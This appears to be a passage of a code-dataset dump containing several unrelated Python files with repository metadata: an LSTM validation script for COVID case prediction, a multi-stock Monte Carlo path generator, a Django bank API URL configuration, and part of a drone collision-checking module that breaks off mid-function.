"line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 18, "usage_type": "attribute"}, {"api_name": "seaborn.set_context", "line_number": 23, "usage_type": "call"}, {"api_name": "seaborn.set_style", "line_number": 24, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 38, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 39, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 40, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 41, "usage_type": "call"}, {"api_name": "proc.detection_task.load_logregs", "line_number": 42, "usage_type": "call"}, {"api_name": "proc.detection_task", "line_number": 42, "usage_type": "name"}, {"api_name": "numpy.cat", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.cat", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 66, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 88, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 88, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 92, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 92, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 96, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 96, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 100, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 105, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 109, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 109, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axhline", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 127, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 127, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 128, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 128, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 142, "usage_type": "call"}, {"api_name": "numpy.maximum", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.backends.backend_pdf.PdfPages", "line_number": 148, "usage_type": "call"}, {"api_name": "itertools.product", "line_number": 149, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 155, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 155, "usage_type": "name"}, {"api_name": "numpy.cat", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 157, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 159, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 159, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 162, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 162, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 168, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 168, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 171, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 171, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 178, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 178, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 181, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 181, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 182, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 182, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 188, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 188, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 190, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 190, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}]} +{"seq_id": "1201024418", "text": "import os\nimport torch\nimport torch.nn as nn\nimport numpy as np\nimport matplotlib.pyplot as plot\nimport rnn\n\n\n# def create_in_sequences_normalised_per_region(all_data, window):\n# out_seq = []\n# for in_data in all_data:\n# l = len(in_data)\n# temp_seq = []\n# for i in range(l - window):\n# train_seq = torch.FloatTensor(in_data[i:i + window])\n# train_label = torch.FloatTensor(in_data[i + window:i + window + 1])[0]\n\n# mx = max([max(i) for i in train_seq])\n\n# train_seq = torch.div(train_seq, mx)\n# train_label = torch.div(train_label, mx)\n# temp_seq.append((train_seq, train_label, mx))\n# out_seq.append(temp_seq)\n# return out_seq\n\n\nmodel = rnn.LSTM()\nmodel.load_state_dict(torch.load(\"../trained_model_state_ep50.pt\"))\nmodel.eval()\n\n\nwindow = 28\n\nvalidation_data = rnn.load_folder(\"../data/validation_data/\")\n\nvalidation_in_seq = rnn.create_in_sequences_normalised(validation_data, window)\n\ndifferences = [[],[],[],[]]\ncount = 0\n\nfor seq, labels in validation_in_seq:\n with torch.no_grad():\n model.hidden = (torch.zeros(1, 1, model.hidden_layer_size), torch.zeros(1, 1, model.hidden_layer_size))\n\n mx = torch.max(seq)\n seq, labels = torch.div(seq, mx), torch.div(labels, mx)\n prediction = model(seq)\n prediction *= mx\n\n\n # Adjust Weights\n prediction[0] = prediction[0] / (1 - 0.3514)\n prediction[1] = prediction[1] / (1 - 0.2965)\n prediction[2] = prediction[2] / (1 - 0.3456)\n prediction[3] = prediction[3] / (1 - 0.3967)\n\n # Calculate Differences for each prediction across the Data set\n for i in range(len(prediction)):\n if labels[i] != 0:\n difference = (prediction[i] - labels[i]) / labels[i]\n differences[i].append(difference.item()*100)\n \nfor i in range(len(differences)):\n differences[i] = np.asarray(differences[i])\n\nprint(\"Confirmed: {:0.2f}% +/- {:0.2f}%\".format(np.mean(differences[0]), np.std(differences[0])))\nprint(\"Deaths: {:0.2f}% +/- {:0.2f}%\".format(np.mean(differences[1]), np.std(differences[1])))\nprint(\"Recovered: {:0.2f}% +/- {:0.2f}%\".format(np.mean(differences[2]), np.std(differences[2])))\nprint(\"Active: {:0.2f}% +/- {:0.2f}%\".format(np.mean(differences[3]), np.std(differences[3])))\n\n\n# Weekly Prediction\n# weekly_seq = create_in_sequences_normalised_per_region(validation_data, window)\n\n# fut_pred = 7\n# averages = [[],[],[],[]]\n# totals_pred = [0,0,0,0]\n# totals_real = [0,0,0,0]\n\n# # Iterate through each region\n# for region in weekly_seq:\n\n# input_data = region[-(fut_pred+1)][0].tolist()\n# og_data = region[-1]\n# og_max = region[-1][2].item()\n# mx = region[-(fut_pred+1)][2].item()\n\n# # Prediction for the week\n# # input_data[-7:] will give you the list of predictions\n# for i in range(fut_pred):\n# seq = torch.FloatTensor(input_data[-window:])\n\n# with torch.no_grad():\n# model.hidden = (torch.zeros(1, 1, model.hidden_layer_size), torch.zeros(1, 1, model.hidden_layer_size))\n\n# prediction = model(seq)\n\n# # Adjust Weights\n# prediction[0] = prediction[0] / (1 - 0.3514)\n# prediction[1] = prediction[1] / (1 - 0.2965)\n# prediction[2] = prediction[2] / (1 - 0.3456)\n# prediction[3] = prediction[3] / (1 - 0.3967)\n\n# input_data.append(prediction.tolist())\n\n# sumReal = [0, 0, 0, 0]\n# sumPredict = [0, 0, 0, 0]\n# for i in range(fut_pred):\n# for k in range(4):\n# real = (og_data[0][-(fut_pred - i)][k].item() * og_max)\n# predict = (input_data[-(fut_pred - i)][k] * mx)\n# sumReal[k] += real\n# sumPredict[k] += predict\n\n# for i in range(4):\n# avgR = (sumReal[i] / fut_pred)\n# avgP = (sumPredict[i] / fut_pred)\n# totals_pred[i] += avgP\n# totals_real[i] += avgR\n# if avgR != 0:\n# averages[i].append( ( ( avgP - avgR ) / avgR) * 100)\n\n\n# print(\"Last Item: Next day predicted Total: {:0f}\".format((input_data[-7][0] * mx)))\n# print(\"Last Item: Next day actual Total: {:0f}\\n\".format((og_data[0][-7][0].item() * og_max)))\n\n# print(\"Last Item: Prediction Average: {:0.2f}\".format(sumPredict[0] / fut_pred))\n# print(\"Last Item: Next Week Average: {:0.2f}\\n\".format(sumReal[0]/fut_pred))\n\n# print(\"Predicted Total Average Cases over the week: {:0.2f}\".format(totals_pred[0]))\n# print(\"Actual Total Average Cases over the week: {:0.2f}\\n\".format(totals_real[0]))\n\n\n# print(\"Confirmed: {:0.2f}% +/- {:0.2f}%\".format(np.mean(averages[0]), np.std(averages[0])))\n# print(\"Deaths: {:0.2f}% +/- {:0.2f}%\".format(np.mean(averages[1]), np.std(averages[1])))\n# print(\"Recovered: {:0.2f}% +/- {:0.2f}%\".format(np.mean(averages[2]), np.std(averages[2])))\n# print(\"Active: {:0.2f}% +/- {:0.2f}%\".format(np.mean(averages[3]), np.std(averages[3])))\n\n\n", "repo_name": "blvanderwalt/AI-Machine-Learning-Prediction", "sub_path": "Project Code/validation.py", "file_name": "validation.py", "file_ext": "py", "file_size_in_byte": 4918, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "rnn.LSTM", "line_number": 27, "usage_type": "call"}, {"api_name": "torch.load", "line_number": 28, "usage_type": "call"}, {"api_name": "rnn.load_folder", "line_number": 34, "usage_type": "call"}, {"api_name": "rnn.create_in_sequences_normalised", "line_number": 36, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.zeros", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.max", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.div", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 68, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.std", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "29635131508", "text": "\nfrom . import parameter as param\nfrom . import path\nfrom . import stats\n\nfrom scipy import linalg\nimport numpy as np\nimport pandas as pd\n\nfrom pandas.tseries.holiday import USFederalHolidayCalendar\n\nMARKET_SECONDS_PER_YEAR = 252.0*6.5*60.0*60.0\n\nclass MultiStockPath:\n def __init__(self,\n generator,\n correlation_matrix,\n sigmas,\n stock_names):\n self.generator = generator.clone()\n # check dimensions of matrix and sigmas etc all work out\n self.correlation_matrix = correlation_matrix\n self.sigmas = sigmas\n self.stock_names = stock_names\n\n def get_path(self, initial_values, t_start, t_end, freq, interest_rate, seed=None):\n # check initial value os the right size and dimension\n #print(\"getting path \" , freq.)\n # set up parameters of the pathway model\n covar = stats.corr_to_cov(self.correlation_matrix,self.sigmas)\n covar_param = param.SimpleArrayParam(covar)\n\n chol = linalg.cholesky(covar,lower=True)\n chol[chol<1.0e-9]=0.0\n cholesky_param = param.SimpleArrayParam(chol)\n\n r_param = param.SimpleParam(interest_rate)\n\n # create the index of times that are in market hours between\n # requested times\n timeindex = pd.date_range(start=t_start,end=t_end,freq=freq)\n # get the frequency (in seconds) now before removing non-market times\n freq_in_secs = pd.to_timedelta(timeindex.freq,unit='s').total_seconds()\n # only trading hours\n timeindex = timeindex[timeindex.indexer_between_time('09:30','16:00')]\n # only weekdays\n timeindex = timeindex[~(timeindex.dayofweek > 4)]\n # remove fed holidays\n cal = USFederalHolidayCalendar()\n hols = cal.holidays(start=timeindex.min(), end=timeindex.max())\n timeindex=timeindex[~timeindex.isin(hols)]\n\n # get array of time in yearly units and get stock pathways\n times = np.arange(0,len(timeindex))*freq_in_secs/MARKET_SECONDS_PER_YEAR\n\n # seed and create the pathway generator object\n np.random.seed(seed=seed)\n path_maker = path.GeometricDiffusionManyAsset(self.generator,\n r_param,\n covar_param,\n cholesky_param)\n\n if len(times)>0:\n s_paths = path_maker.get_single_timed_path(initial_values,times)\n else:\n raise RunTimeError('Trying to generate stocks on empty time list')\n\n # put all data into a pandas Dataframe\n stocks_df = pd.DataFrame(index=timeindex,data=s_paths,columns=self.stock_names)\n print(\"internal : \",stocks_df.groupby(stocks_df.index.dayofweek).sum())\n np.random.seed(seed=None)\n return stocks_df\n\ndef time_index_to_seconds_elapsed(time_index):\n t_elapsed_s = pd.to_timedelta(time_index - time_index[0]).total_seconds()\n return t_elapsed_s.values\n", "repo_name": "pdghawk/systrade", "sub_path": "systrade/monte/stocks.py", "file_name": "stocks.py", "file_ext": "py", "file_size_in_byte": 3034, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "scipy.linalg.cholesky", "line_number": 33, "usage_type": "call"}, {"api_name": "scipy.linalg", "line_number": 33, "usage_type": "name"}, {"api_name": "pandas.date_range", "line_number": 41, "usage_type": "call"}, {"api_name": "pandas.to_timedelta", "line_number": 43, "usage_type": "call"}, {"api_name": "pandas.tseries.holiday.USFederalHolidayCalendar", "line_number": 49, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 57, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 57, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.random.seed", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 71, "usage_type": "attribute"}, {"api_name": "pandas.to_timedelta", "line_number": 75, "usage_type": "call"}]} +{"seq_id": "74070161124", "text": "\"\"\"BankManager URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf import settings\nfrom django.contrib import admin\nfrom django.urls import path, include\nfrom rest_framework import authentication, permissions\nfrom rest_framework.documentation import include_docs_urls\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('user/', include('users.urls')),\n path('transaction/', include('transactions.urls')),\n path('docs/', include_docs_urls(title='Bank API',\n description='User JSON authentication only (scheme value is JWT)',\n authentication_classes=(authentication.BasicAuthentication,),\n permission_classes=(permissions.IsAdminUser,),\n schema_url=f'{settings.HOST_NAME}:{settings.HOST_PORT}',\n )\n ),\n]\n", "repo_name": "maminh/BankManager", "sub_path": "BankManager/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 1488, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 23, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 23, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 24, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "django.urls.include", "line_number": 25, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "rest_framework.documentation.include_docs_urls", "line_number": 26, "usage_type": "call"}, {"api_name": "rest_framework.authentication.BasicAuthentication", "line_number": 28, "usage_type": "attribute"}, {"api_name": "rest_framework.authentication", "line_number": 28, "usage_type": "name"}, {"api_name": "rest_framework.permissions.IsAdminUser", "line_number": 29, "usage_type": "attribute"}, {"api_name": "rest_framework.permissions", "line_number": 29, "usage_type": "name"}, {"api_name": "django.conf.settings.HOST_NAME", "line_number": 30, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 30, "usage_type": "name"}, {"api_name": "django.conf.settings.HOST_PORT", "line_number": 30, "usage_type": "attribute"}]} +{"seq_id": "9438275256", "text": "from __future__ import annotations\n\nimport copy\nimport itertools\nimport math\nimport os\nfrom itertools import combinations\nfrom typing import List, Dict, Set, Tuple\n\nimport matplotlib.pyplot as plt\nfrom scipy.stats import ncx2\nfrom tabulate import tabulate\n\nfrom xdrone.shared.collision_config import CollisionConfig\nfrom xdrone.shared.command import AbstractDroneCommand, SingleDroneCommand, ParallelDroneCommands, Command\nfrom xdrone.shared.drone_config import DroneConfig\nfrom xdrone.shared.safety_check_error import SafetyCheckError\nfrom xdrone.shared.state import State\nfrom xdrone.state_updaters.state_updater import StateUpdater\n\n\nclass StateVariance:\n def __init__(self, state: State, variance: float = 0.0):\n self._state = state\n self._variance = variance\n\n @property\n def variance(self) -> float:\n return copy.deepcopy(self._variance)\n\n @property\n def state(self) -> State:\n return copy.deepcopy(self._state)\n\n\nclass CollisionChecker:\n def __init__(self, drone_config_map: Dict[str, DroneConfig], collision_config: CollisionConfig):\n self.drone_config_map = drone_config_map\n self.collision_config = collision_config\n\n def check(self, drone_commands: List[AbstractDroneCommand],\n state_updater_map: Dict[str, StateUpdater],\n save_report: bool = False):\n if len(self.drone_config_map) == 1:\n # no need to check if there is only 1 drone\n return\n drone_trajectory_map = {name: [StateVariance(state_updater.get_init_state())] for name, state_updater in\n state_updater_map.items()}\n drones_involved = set(state_updater_map.keys())\n try:\n self._update_states_for_abstract_drone_command(drone_commands, state_updater_map, drone_trajectory_map,\n drones_involved)\n except Exception as e:\n raise SafetyCheckError(\"Error occurred during collision check, \"\n \"please retry with a better collision_config. Error: \" + str(e))\n\n collisions, time_slice_info = self._get_possible_collisions_and_time_slice_info(drone_trajectory_map)\n if save_report:\n CollisionReportSaver.save_check_report(time_slice_info)\n self._check_collisions(collisions)\n\n def _get_possible_collisions_and_time_slice_info(self, drone_trajectory_map: Dict[str, List[StateVariance]]) \\\n -> (List[Tuple], List[Tuple]):\n time = 0\n time_slice_info = []\n collisions = []\n drone_trajectories = dict(drone_trajectory_map)\n while any(drone_trajectories.values()):\n time += self.collision_config.time_interval_seconds\n state_group = []\n for name, drone_trajectory in drone_trajectories.items():\n possible_states = []\n while drone_trajectory and drone_trajectory[0].state.time_used_seconds < time:\n state_variance = drone_trajectory.pop(0)\n possible_states.append((name, state_variance))\n if possible_states:\n state_group.append(possible_states)\n # Commented out: check all possible states combinations if one drone has multiple states in time interval\n # possible_combinations = list(itertools.product(*state_group))\n # Only check combinations of last states if one drone has multiple states in time interval\n state_group = [possible_states[-1] for possible_states in state_group]\n possible_combinations = list(itertools.combinations(state_group, r=2))\n for possible_combination in possible_combinations:\n for (name1, state_variance1), (name2, state_variance2) in combinations(possible_combination, r=2):\n state1, variance1 = state_variance1.state, state_variance1.variance\n state2, variance2 = state_variance2.state, state_variance2.variance\n variance = variance1 + variance2\n\n x = state1.x_meters - state2.x_meters\n y = state1.y_meters - state2.y_meters\n z = state1.z_meters - state2.z_meters\n mean_distance = math.sqrt(x ** 2 + y ** 2 + z ** 2)\n collision_meters = self.collision_config.collision_meters\n\n if math.isclose(variance, 0):\n # when variance is 0, perform as determined, confidence is either 1 or 0\n if collision_meters == 0:\n confidence = 0.0\n elif mean_distance > collision_meters + 1e-5:\n confidence = 0.0\n else:\n confidence = 1.0\n else:\n # use non central chi-squared distribution to calculated confidence\n nc = x ** 2 / variance + y ** 2 / variance + z ** 2 / variance\n confidence = ncx2.cdf(collision_meters ** 2 / variance, df=3, nc=nc)\n\n if confidence >= self.collision_config.confidence_threshold - 1e-8:\n collisions.append((name1, name2, state1, state2, mean_distance, confidence))\n\n time_slice_info.append((name1, name2, time, mean_distance, confidence))\n return collisions, time_slice_info\n\n def _check_collisions(self, collisions: List[Tuple[str, str, State, State, float, float]]):\n if collisions:\n error_msg = \"Collisions might happen!\\n\"\n for name1, name2, state1, state2, mean_distance, confidence in collisions:\n time = round((state1.time_used_seconds + state2.time_used_seconds) / 2, 2)\n x = round((state1.x_meters + state2.x_meters) / 2, 2)\n y = round((state1.y_meters + state2.y_meters) / 2, 2)\n z = round((state1.z_meters + state2.z_meters) / 2, 2)\n mean_distance = round(mean_distance, 5)\n error_msg += (\"Collision might happen between {} and {}, at time {}s, \".format(name1, name2, time) +\n \"near position (x={}m, y={}m, z={}m), distance={}m, confidence={:.3f}%\\n\"\n .format(x, y, z, mean_distance, confidence * 100))\n raise SafetyCheckError(error_msg)\n\n def _update_states_for_abstract_drone_command(self, drone_commands: List[AbstractDroneCommand],\n state_updaters: Dict[str, StateUpdater],\n drone_trajectory_map: Dict[str, List[StateVariance]],\n drones_involved: Set[str]) -> float:\n total_time_used = 0\n for drone_command in drone_commands:\n if isinstance(drone_command, SingleDroneCommand):\n total_time_used += self._update_states_for_single_drone_command(drone_command,\n state_updaters,\n drone_trajectory_map,\n drones_involved)\n elif isinstance(drone_command, ParallelDroneCommands):\n total_time_used += self._update_states_for_parallel_drone_commands(drone_command,\n state_updaters,\n drone_trajectory_map,\n drones_involved)\n return total_time_used\n\n def _update_states_for_single_drone_command(self, single_drone_command: SingleDroneCommand,\n state_updaters: Dict[str, StateUpdater],\n drone_trajectory_map: Dict[str, List[StateVariance]],\n drones_involved: Set[str]) -> float:\n time_used = self._update_states(single_drone_command, state_updaters, drone_trajectory_map, drones_involved)\n return time_used\n\n def _get_last_state_and_variance(self, drone_trajectory_map: Dict[str, List[StateVariance]],\n drone_name: str) -> (State, float):\n old_state_variance = drone_trajectory_map[drone_name][-1]\n old_state = old_state_variance.state\n old_variance = old_state_variance.variance\n return old_state, old_variance\n\n def _update_states(self, single_drone_command: SingleDroneCommand,\n state_updaters: Dict[str, StateUpdater],\n drone_trajectory_map: Dict[str, List[StateVariance]],\n drones_involved: Set[str]) -> float:\n time_interval = self.collision_config.time_interval_seconds\n drone_name = single_drone_command.drone_name\n command = single_drone_command.command\n if command.opcode == \"takeoff\":\n takeoff_distance = self.drone_config_map[drone_name].takeoff_height_meters\n new_drone_command = SingleDroneCommand(drone_name, Command.up(takeoff_distance))\n return self._update_states(new_drone_command, state_updaters, drone_trajectory_map, drones_involved)\n if command.opcode == \"land\":\n old_state, old_variance = self._get_last_state_and_variance(drone_trajectory_map, drone_name)\n land_distance = old_state.z_meters\n new_drone_command = SingleDroneCommand(drone_name, Command.down(land_distance))\n return self._update_states(new_drone_command, state_updaters, drone_trajectory_map, drones_involved)\n if command.opcode == \"wait\":\n seconds, = command.operands\n old_state, old_variance = self._get_last_state_and_variance(drone_trajectory_map, drone_name)\n if seconds <= time_interval:\n new_state = state_updaters[drone_name].update(Command.wait(seconds), old_state)\n new_state_variance = StateVariance(new_state, old_variance)\n drone_trajectory_map[drone_name].append(new_state_variance)\n for name in drones_involved.difference({drone_name}):\n state, variance = self._get_last_state_and_variance(drone_trajectory_map, name)\n state = state.copy_and_set_time_used_seconds(state.time_used_seconds + seconds)\n drone_trajectory_map[name].append(StateVariance(state, variance))\n return seconds\n else:\n new_state = state_updaters[drone_name].update(Command.wait(time_interval), old_state)\n new_state_variance = StateVariance(new_state, old_variance)\n drone_trajectory_map[drone_name].append(new_state_variance)\n for name in drones_involved.difference({drone_name}):\n state, variance = self._get_last_state_and_variance(drone_trajectory_map, name)\n state = state.copy_and_set_time_used_seconds(state.time_used_seconds + time_interval)\n drone_trajectory_map[name].append(StateVariance(state, variance))\n new_drone_command = SingleDroneCommand(drone_name, Command.wait(seconds - time_interval))\n return time_interval + self._update_states(new_drone_command, state_updaters, drone_trajectory_map,\n drones_involved)\n if command.opcode in [\"rotate_left\", \"rotate_right\"]:\n degrees, = command.operands\n old_state, old_variance = self._get_last_state_and_variance(drone_trajectory_map, drone_name)\n rotate_speed = self.drone_config_map[drone_name].rotate_speed_dps\n seconds = degrees / rotate_speed\n if seconds <= time_interval:\n new_state = state_updaters[drone_name].update(Command(command.opcode, [rotate_speed * seconds]),\n old_state)\n new_variance = old_variance + self.drone_config_map[drone_name].var_per_degree * seconds * rotate_speed\n new_state_variance = StateVariance(new_state, new_variance)\n drone_trajectory_map[drone_name].append(new_state_variance)\n for name in drones_involved.difference({drone_name}):\n state, variance = self._get_last_state_and_variance(drone_trajectory_map, name)\n state = state.copy_and_set_time_used_seconds(state.time_used_seconds + seconds)\n drone_trajectory_map[name].append(StateVariance(state, variance))\n return seconds\n else:\n new_state = state_updaters[drone_name].update(Command(command.opcode, [rotate_speed * time_interval]),\n old_state)\n new_variance = old_variance + \\\n self.drone_config_map[drone_name].var_per_degree * time_interval * rotate_speed\n new_state_variance = StateVariance(new_state, new_variance)\n drone_trajectory_map[drone_name].append(new_state_variance)\n for name in drones_involved.difference({drone_name}):\n state, variance = self._get_last_state_and_variance(drone_trajectory_map, name)\n state = state.copy_and_set_time_used_seconds(state.time_used_seconds + time_interval)\n drone_trajectory_map[name].append(StateVariance(state, variance))\n new_drone_command = SingleDroneCommand(drone_name,\n Command(command.opcode,\n [degrees - rotate_speed * time_interval]))\n return time_interval + self._update_states(new_drone_command, state_updaters, drone_trajectory_map,\n drones_involved)\n if command.opcode in [\"up\", \"down\", \"left\", \"right\", \"forward\", \"backward\"]:\n meters, = command.operands\n old_state_variance = drone_trajectory_map[drone_name][-1]\n old_state = old_state_variance.state\n old_variance = old_state_variance.variance\n speed = self.drone_config_map[drone_name].speed_mps\n seconds = meters / speed\n if seconds <= time_interval:\n new_state = state_updaters[drone_name].update(Command(command.opcode, [speed * seconds]),\n old_state)\n new_variance = old_variance + self.drone_config_map[drone_name].var_per_meter * seconds * speed\n new_state_variance = StateVariance(new_state, new_variance)\n drone_trajectory_map[drone_name].append(new_state_variance)\n for name in drones_involved.difference({drone_name}):\n state_variance = drone_trajectory_map[name][-1]\n state = state_variance.state\n variance = state_variance.variance\n state = state.copy_and_set_time_used_seconds(state.time_used_seconds + seconds)\n drone_trajectory_map[name].append(StateVariance(state, variance))\n return seconds\n else:\n new_state = state_updaters[drone_name].update(Command(command.opcode, [speed * time_interval]),\n old_state)\n new_variance = old_variance + self.drone_config_map[drone_name].var_per_meter * time_interval * speed\n new_state_variance = StateVariance(new_state, new_variance)\n drone_trajectory_map[drone_name].append(new_state_variance)\n for name in drones_involved.difference({drone_name}):\n state_variance = drone_trajectory_map[name][-1]\n state = state_variance.state\n variance = state_variance.variance\n state = state.copy_and_set_time_used_seconds(state.time_used_seconds + time_interval)\n drone_trajectory_map[name].append(StateVariance(state, variance))\n new_drone_command = SingleDroneCommand(drone_name,\n Command(command.opcode, [meters - speed * time_interval]))\n return time_interval + self._update_states(new_drone_command, state_updaters, drone_trajectory_map,\n drones_involved)\n\n def _update_states_for_parallel_drone_commands(self, parallel_drone_commands: ParallelDroneCommands,\n state_updaters: Dict[str, StateUpdater],\n drone_trajectory_map: Dict[str, List[StateVariance]],\n drones_involved: Set[str]) -> float:\n assert len(parallel_drone_commands.branches) > 0\n time_used_in_branches = self._update_states_and_check_for_each_branch(parallel_drone_commands,\n state_updaters,\n drone_trajectory_map)\n longest_time_used = self._update_states_to_wait_for_slowest_branch(parallel_drone_commands,\n state_updaters,\n drone_trajectory_map,\n time_used_in_branches,\n drones_involved)\n return longest_time_used\n\n def _update_states_and_check_for_each_branch(self, parallel_drone_commands: ParallelDroneCommands,\n state_updaters: Dict[str, StateUpdater],\n drone_trajectory_map: Dict[str, List[StateVariance]]) -> List[float]:\n time_used_in_branches = []\n for i, branch in enumerate(parallel_drone_commands.branches):\n drones_involved = parallel_drone_commands.drones_involved_each_branch[i]\n time_used = self._update_states_for_abstract_drone_command(branch, state_updaters,\n drone_trajectory_map, drones_involved)\n time_used_in_branches.append(time_used)\n return 